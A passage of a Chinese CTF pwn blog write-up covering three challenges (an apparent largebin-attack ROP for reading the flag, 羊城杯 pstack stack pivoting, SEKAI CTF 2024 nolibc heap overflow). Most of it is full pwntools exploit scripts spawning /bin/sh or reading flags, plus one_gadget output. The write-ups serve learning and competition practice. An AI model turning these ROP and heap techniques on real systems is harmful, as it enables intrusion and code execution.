class="number">0</span>)</span><br><span class="line">add(<span class="number">0x498</span>) <span class="comment"># 3 打入largebin</span></span><br><span class="line">delete(<span class="number">2</span>,<span class="string">&#x27;y&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;write?\n&#x27;</span>,<span class="string">&#x27;0&#x27;</span>)</span><br><span class="line">p.sendafter(<span class="string">&#x27;content: \n&#x27;</span>,p64(addr+<span class="number">0x101a</span>)+p64(<span class="number">0</span>)+p64(addr+<span class="number">0x4050</span>-<span class="number">0x20</span>))</span><br><span class="line">add(<span class="number">0x4f0</span>) <span class="comment"># 4 largebin attack</span></span><br><span class="line"></span><br><span class="line">ret = addr+<span class="number">0x101a</span></span><br><span class="line">pop_rdi_ret = addr+<span class="number">0x1863</span></span><br><span class="line">puts_got = addr+elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_plt = addr+elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">bss_addr = addr+<span class="number">0x4020</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x28</span></span><br><span class="line">payload += p64(pop_rdi_ret)</span><br><span class="line">payload += p64(puts_got)</span><br><span class="line">payload += p64(puts_plt)</span><br><span class="line">payload += p64(addr+<span class="number">0x15E1</span>) <span class="comment">#edit_addr</span></span><br><span class="line"></span><br><span class="line">edit(payload) <span class="comment"># libc 泄露</span></span><br><span class="line"></span><br><span class="line">libc_base = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))-libc.sym[<span class="string">&#x27;puts&#x27;</span>]<span class="comment">#-0x080e50#</span></span><br><span class="line">rdi = libc_base + <span class="built_in">next</span>(libc.search(asm(<span class="string">&#x27;pop rdi;ret;&#x27;</span>)))</span><br><span class="line">rsi = libc_base + <span class="built_in">next</span>(libc.search(asm(<span class="string">&#x27;pop rsi;ret;&#x27;</span>)))</span><br><span class="line">rdx = libc_base + <span class="built_in">next</span>(libc.search(asm(<span class="string">&#x27;pop rdx;pop r12;ret;&#x27;</span>)))</span><br><span class="line">r12 =  libc_base + <span class="built_in">next</span>(libc.search(asm(<span class="string">&#x27;pop r12;ret;&#x27;</span>)))</span><br><span class="line">leave_ret = libc_base + <span class="built_in">next</span>(libc.search(asm(<span class="string">&#x27;leave;ret;&#x27;</span>)))</span><br><span class="line"></span><br><span class="line">open_addr=libc.symbols[<span class="string">&#x27;open&#x27;</span>]+libc_base</span><br><span class="line">read_addr=libc.symbols[<span class="string">&#x27;read&#x27;</span>]+libc_base</span><br><span class="line">write_addr=libc.symbols[<span class="string">&#x27;write&#x27;</span>]+libc_base</span><br><span class="line">puts_addr=libc.symbols[<span class="string">&#x27;puts&#x27;</span>]+libc_base</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(addr))</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x28</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># read &#x27;./flag\x00\x00&#x27;</span></span><br><span class="line">payload += p64(rdi)+p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(rsi)+p64(bss_addr+<span class="number">0x100</span>)</span><br><span class="line">payload += p64(rdx)+p64(<span class="number">0x10</span>)+p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(read_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment"># orw</span></span><br><span class="line"><span class="comment"># open</span></span><br><span class="line">payload += p64(rdi)+p64(addr+elf.bss()+<span class="number">0x100</span>)</span><br><span class="line">payload += p64(rsi)+p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(rdx)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(open_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment">#read</span></span><br><span class="line">payload += p64(rdi)+p64(<span class="number">3</span>)</span><br><span class="line">payload += p64(rsi)+p64(addr+elf.bss()+<span class="number">0x200</span>)</span><br><span class="line">payload += p64(rdx)+p64(<span class="number">0x30</span>)+p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(read_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment"># write</span></span><br><span class="line">payload += p64(rdi)+p64(<span class="number">1</span>)</span><br><span class="line">payload += p64(rsi)+p64(addr+elf.bss()+<span class="number">0x200</span>)</span><br><span class="line">payload += p64(rdx)+p64(<span class="number">0x30</span>)+p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(write_addr)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;story!\n&#x27;</span>, payload)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">p.send(<span class="string">&#x27;./flag\x00\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>
<p>这个题细节还是挺多的其实。</p>
<h1 id="羊城杯"><a href="#羊城杯" class="headerlink" title="羊城杯"></a>羊城杯</h1><h2 id="pstack"><a href="#pstack" class="headerlink" title="pstack"></a>pstack</h2><p>其实我想给mini的小朋友们出个这个的，但是吧当时自己一下子没做出来(´Ａ｀。)<br>不过其实比赛的时候想出来怎么做了，可惜没啥时间（就是自己水平低没秒掉而已）</p>
<p>静态分析没啥好看的，就是一个 read 多泄露 0x10 的栈溢出，显然栈迁移，问题在于只有一个 read 且可利用长度很短。每次都写在栈上没办法保留payload。</p>
<p>我的思路是返回的时候不要返回到函数开头，这样把函数开始栈初始化的部分跳过几句，rbp的值就可以一直保留在我们更改的地方，而之后 read 所输入的内容也是在这段栈上。</p>
<p>也是当时看了看汇编灵光一现。</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context(log_level = <span class="string">&#x27;debug&#x27;</span>, arch = <span class="string">&#x27;amd64&#x27;</span>, os = <span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line"><span class="comment"># p=remote(&quot;&quot;.)</span></span><br><span class="line">p= process(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;./libc.so.6&quot;</span>)</span><br><span class="line"></span><br><span class="line">puts_plt=elf.plt[<span class="string">&quot;puts&quot;</span>]</span><br><span class="line">puts_got=elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">pop_rdi = <span class="number">0x0400773</span> </span><br><span class="line">bss =<span class="number">0x601b10</span>+<span class="number">0x30</span></span><br><span class="line">vuln_4 = <span class="number">0x04006B4</span></span><br><span class="line">lea_ret = <span class="number">0x04006db</span></span><br><span class="line"></span><br><span class="line">payload1 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x30</span></span><br><span class="line">payload1 += p64(bss)</span><br><span class="line">payload1 += p64(vuln_4)</span><br><span class="line">p.sendafter(<span class="string">b&quot;overflow?&quot;</span>,payload1)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x10</span></span><br><span class="line">payload2 += p64(pop_rdi)</span><br><span class="line">payload2 += p64(puts_got)</span><br><span class="line">payload2 += p64(puts_plt)</span><br><span class="line">payload2 += p64(vuln_4-<span class="number">0x04</span>)</span><br><span class="line">payload2 += p64(bss-<span class="number">0x28</span>)</span><br><span class="line">payload2 += p64(lea_ret)</span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">b&quot;overflow?&quot;</span>,payload2)</span><br><span class="line">p.recvline()</span><br><span class="line">libc_addr=u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))-<span class="number">0x80e50</span></span><br><span class="line">success(<span class="string">&#x27;libc=&#x27;</span>+<span class="built_in">hex</span>(libc_addr))</span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">b&quot;overflow?&quot;</span>,payload1)</span><br><span class="line"></span><br><span class="line">payload2 = p64(pop_rdi)</span><br><span class="line">payload2 += p64(libc_addr+<span class="number">0x01d8678</span>)</span><br><span class="line">payload2 += p64(libc_addr+libc.sym[<span class="string">&#x27;system&#x27;</span>])</span><br><span class="line">payload2 += <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x18</span></span><br><span class="line">payload2 += p64(bss-<span class="number">0x38</span>)</span><br><span class="line">payload2 += p64(lea_ret)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">p.sendafter(<span class="string">b&quot;overflow?&quot;</span>,payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<p>打完之后感觉给小朋友出这个有点欺负人hhh。<br>不过需要注意的几点在出 mini 的时候其实都遇到了，主要就是主要要把栈迁移的地址往后写一点，因为在调用 puts 和 system 的时候都会调用多级函数，导致栈空间一直向上增长，毕竟我们不是写在系统分配的栈的页里，所以有可能会覆盖一些不能覆盖的东西或者遇到不可读不可写的地方。</p>
<p>这个时候就会有 段错误（指针无法正确解引用或者权限错误）</p>
<p>且尤其是栈迁移的次数越多，对可用空间的需求就越大，这也是 puts 函数时灵时不灵的原因。</p>
<p>当然，如果使用one_gadget，就没有 system 的栈增长问题，不过好巧不巧这个one_gadget暑假出过题都试过，总之我是没凑出来（（<br>所以当时另辟蹊径做了一些小手段，保证 system 也不会报错。</p>
<p>对于这个题因为为了 puts 也能顺利通过，真正写入payload的地址早就离 bss 很远了，所以报错了就再往后移个一点点好了（但似乎在调试的时候也遇到了移过头的问题，看起来像是正好覆盖了什么东西，具体原因不清楚）</p>
<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">0xebc81 execve(<span class="string">&quot;/bin/sh&quot;</span>, r10, [rbp-0x70])</span><br><span class="line">constraints:</span><br><span class="line">  address rbp-0x78 is writable</span><br><span class="line">  [r10] == NULL || r10 == NULL || r10 is a valid argv</span><br><span class="line">  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp</span><br><span class="line"></span><br><span class="line">0xebc85 execve(<span class="string">&quot;/bin/sh&quot;</span>, r10, rdx)</span><br><span class="line">constraints:</span><br><span class="line">  address rbp-0x78 is writable</span><br><span class="line">  [r10] == NULL || r10 == NULL || r10 is a valid argv</span><br><span class="line">  [rdx] == NULL || rdx == NULL || rdx is a valid envp</span><br><span class="line"></span><br><span class="line">0xebc88 execve(<span class="string">&quot;/bin/sh&quot;</span>, rsi, rdx)</span><br><span class="line">constraints:</span><br><span class="line">  address rbp-0x78 is writable</span><br><span class="line">  [rsi] == NULL || rsi == NULL || rsi is a valid argv</span><br><span class="line">  [rdx] == NULL || rdx == NULL || rdx is a valid envp</span><br><span class="line"></span><br><span class="line">0xebce2 execve(<span class="string">&quot;/bin/sh&quot;</span>, rbp-0x50, r12)</span><br><span class="line">constraints:</span><br><span class="line">  address rbp-0x48 is writable</span><br><span class="line">  r13 == NULL || &#123;<span class="string">&quot;/bin/sh&quot;</span>, r13, NULL&#125; is a valid argv</span><br><span class="line">  [r12] == NULL || r12 == NULL || r12 is a valid envp</span><br><span class="line"></span><br><span class="line">0xebd38 execve(<span class="string">&quot;/bin/sh&quot;</span>, rbp-0x50, [rbp-0x70])</span><br><span class="line">constraints:</span><br><span class="line">  address rbp-0x48 is writable</span><br><span class="line">  r12 == NULL || &#123;<span class="string">&quot;/bin/sh&quot;</span>, r12, NULL&#125; is a valid argv</span><br><span class="line">  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp</span><br><span class="line"></span><br><span class="line">0xebd3f execve(<span class="string">&quot;/bin/sh&quot;</span>, rbp-0x50, [rbp-0x70])</span><br><span class="line">constraints:</span><br><span class="line">  address rbp-0x48 is writable</span><br><span class="line">  rax == NULL || &#123;rax, r12, NULL&#125; is a valid argv</span><br><span class="line">  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp</span><br><span class="line"></span><br><span class="line">0xebd43 execve(<span class="string">&quot;/bin/sh&quot;</span>, rbp-0x50, [rbp-0x70])</span><br><span class="line">constraints:</span><br><span class="line">  address rbp-0x50 is writable</span><br><span class="line">  rax == NULL || &#123;rax, [rbp-0x48], NULL&#125; is a valid argv</span><br><span class="line">  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp</span><br></pre></td></tr></table></figure></div>
<p><em>（总之下次看到这样高版本的og我先跑了。）</em></p>
<h1 id="SEKAI-CTF-2024"><a href="#SEKAI-CTF-2024" class="headerlink" title="SEKAI CTF 2024"></a>SEKAI CTF 2024</h1><h2 id="nolibc"><a href="#nolibc" class="headerlink" title="nolibc"></a>nolibc</h2><p>逆逆逆逆逆！</p>
<p>暑假的时候逆了一次，速度很慢，开学再打开莫名其妙就看得懂了<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2024-10-14192627.png"
                      alt="屏幕截图2024-10-14192627"
                ><br>打开是这样无符号的都是ida自动命名的</p>
<p>然后先一步步把里面有的syscall分析一下大概得到 sub_12C8 是 write, sub_1322是在模拟puts…<br>这一部分结合动态调试可以比较快的出结果，</p>
<p>然后在分析出一段 malloc 。<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241018145354.png"
                      alt="20241018145354"
                ></p>
<p>其实这段 malloc 直接看伪代码我只能分析出大概的功能，但是对具体的内存转换还是不太了解，具体的内容还是在调试中比较明白。<br>（这主要得益于这里乱七八糟的类型转换，比较巧妙的控制了地址）<br>其中这句 <code> chunk_size = (request + 15) &amp; 0xFFFFFFF0;</code><br>很明显有一个堆溢出，原理和libc里的 prev_size 位共用是一样的</p>
<p>add里也可以比规定的 0x100 多申请一个字节<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241018152019.png"
                      alt="20241018152019"
                ></p>
<p>最后分析出把 0x5000~0x15000 的地址作为堆，后面是系统调用号表，把这里open覆盖成exec的系统调用号再传入<code>/bin/sh</code>调用即可。</p>
<p>open 传入文件名的时候也是 malloc 一个堆块的，但是这个时候已经覆盖满了，再临时删掉一个即可</p>
<p>exp</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context(log_level = <span class="string">&#x27;debug&#x27;</span>, arch = <span class="string">&#x27;amd64&#x27;</span>, os = <span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&#x27;./main&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">length, pad</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">b&#x27;option&#x27;</span>, <span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">b&#x27;length&#x27;</span>, <span class="built_in">str</span>(length).encode())</span><br><span class="line">	p.sendlineafter(<span class="string">b&#x27;string&#x27;</span>, pad)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">b&#x27;option&#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">b&#x27;index&#x27;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">load</span>(<span class="params">filename</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">b&#x27;option&#x27;</span>, <span class="string">b&#x27;5&#x27;</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">b&#x27;filename&#x27;</span>, filename)</span><br><span class="line">        </span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;option&#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Username&#x27;</span>, <span class="string">b&#x27;miao&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Password&#x27;</span>, <span class="string">b&#x27;miao&#x27;</span>)    </span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;option&#x27;</span>, <span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Username&#x27;</span>, <span class="string">b&#x27;miao&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Password&#x27;</span>, <span class="string">b&#x27;miao&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x17e</span>): <span class="comment">#0x10000-(0x30+0x30+0x4020)(register所需大小）=0x80*0x17f</span></span><br><span class="line">	add(<span class="number">0x6f</span>, <span class="string">b&#x27;a&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x70</span></span><br><span class="line">payload+= p32(<span class="number">0</span>) + p32(<span class="number">1</span>) + p32(<span class="number">0x3b</span>)</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line">add(<span class="number">0x7c</span>,payload)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">load(<span class="string">b&#x27;/bin/sh&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>审计代码的能力大有长进( ´•̥̥̥ω•̥̥̥&#96; )，以及我真的很能拖，，该学逆向了。</p>

        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> 四道小题快送</li>
        <li><strong>Author:</strong> M1aoo0bin</li>
        <li><strong>Created at
                :</strong> 2024-09-12 19:30:44</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2024-11-04 22:19:20
            </li>
        
        <li>
            <strong>Link:</strong> https://redefine.ohevan.com/2024/09/12/小题快送/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/">#学习日志</a>&nbsp;
                    </li>
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/Pwn/">#Pwn</a>&nbsp;
                    </li>
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/%E5%A4%8D%E7%8E%B0/">#复现</a>&nbsp;
                    </li>
                
            </ul>
        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                    <div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="prev"
                        rel="prev"
                        href="/2024/09/23/ByteCTF2024/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">ByteCTF2024-ezheap</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2024/09/10/%E6%91%94%E6%99%93%E6%9C%88%EF%BC%8C%E5%9D%90%E6%AE%8B%E6%98%9F%EF%BC%8C%E6%B8%A9%E6%97%A7%E6%A2%A6/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">摔晓月，坐残星，温旧梦</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">四道小题快送</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#DASCTF-%E6%9A%91%E6%9C%9F%E6%8C%91%E6%88%98%E8%B5%9B"><span class="nav-number">1.</span> <span class="nav-text">DASCTF 暑期挑战赛</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#springboard"><span class="nav-number">1.1.</span> <span class="nav-text">springboard</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#magicbook"><span class="nav-number">1.2.</span> <span class="nav-text">magicbook</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BE%8A%E5%9F%8E%E6%9D%AF"><span class="nav-number">2.</span> <span class="nav-text">羊城杯</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#pstack"><span class="nav-number">2.1.</span> <span class="nav-text">pstack</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SEKAI-CTF-2024"><span class="nav-number">3.</span> <span class="nav-text">SEKAI CTF 2024</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#nolibc"><span class="nav-number">3.1.</span> <span class="nav-text">nolibc</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%90%8E%E8%AE%B0"><span class="nav-number">4.</span> <span class="nav-text">后记</span></a></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
            <div class="customize-info my-1">借我酒一杯，慢叙愁百千</div>
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">M1aoo0bin</a>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.6.4</a></span>
        </div>
        
        
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fa-solid fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fa-solid fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

